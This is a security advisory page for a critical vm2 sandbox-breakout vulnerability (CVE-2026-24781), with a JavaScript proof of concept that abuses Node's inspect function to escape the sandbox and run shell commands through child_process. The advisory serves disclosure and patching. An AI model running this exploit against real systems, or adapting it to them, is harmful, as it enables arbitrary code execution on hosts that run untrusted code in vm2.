GHSA-v37h-5mfm-c47c

Suggest an improvement
Source
https://github.com/advisories/GHSA-v37h-5mfm-c47c
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-v37h-5mfm-c47c/GHSA-v37h-5mfm-c47c.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-v37h-5mfm-c47c
Aliases
  • CVE-2026-24781
Published
2026-05-05T16:33:14Z
Modified
2026-05-05T16:48:36.563485Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
VM2 Has Sandbox Breakout Through Inspect Function
Details

Summary

VM2 suffers from a sandbox breakout vulnerability through the inspect function. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details

The node inspect method allows to log details of objects. To get to the details, the implementation unwraps proxies. The unwrapped values can be extracted using the this.seen of the stylize function. This allows to get access to the internal proxy handler of VM2 which contains the sandbox object. Since the access to the handler is itself wrapped by a VM2 proxy, accessing the sandbox object in the proxy handler will result in a wrapped sandbox object given into the sandbox. This allows to write a wrapped host object to the wrapped sandbox object and read the raw host object from the raw sandbox object bypassing the proxy bridge.

PoC

const obj = {
    subarray: Buffer.prototype.inspect,
    slice: Buffer.prototype.slice,
    hexSlice:()=>'',
    l:{__proto__: null}
};

obj.slice(20, {showHidden: true, showProxy: true, depth: 10, stylize(a) {
    if (this.seen?.[1]?.objectWrapper) this.seen[1].objectWrapper().x = obj.slice;
    return a;
}});
obj.l.x.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');

Impact

Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T16:33:14Z",
    "cwe_ids": [
        "CWE-693",
        "CWE-94"
    ],
    "severity": "CRITICAL",
    "nvd_published_at": "2026-05-04T17:16:21Z"
}
References

Affected packages

npm / vm2

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
3.11.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-v37h-5mfm-c47c/GHSA-v37h-5mfm-c47c.json"
last_known_affected_version_range
"<= 3.10.3"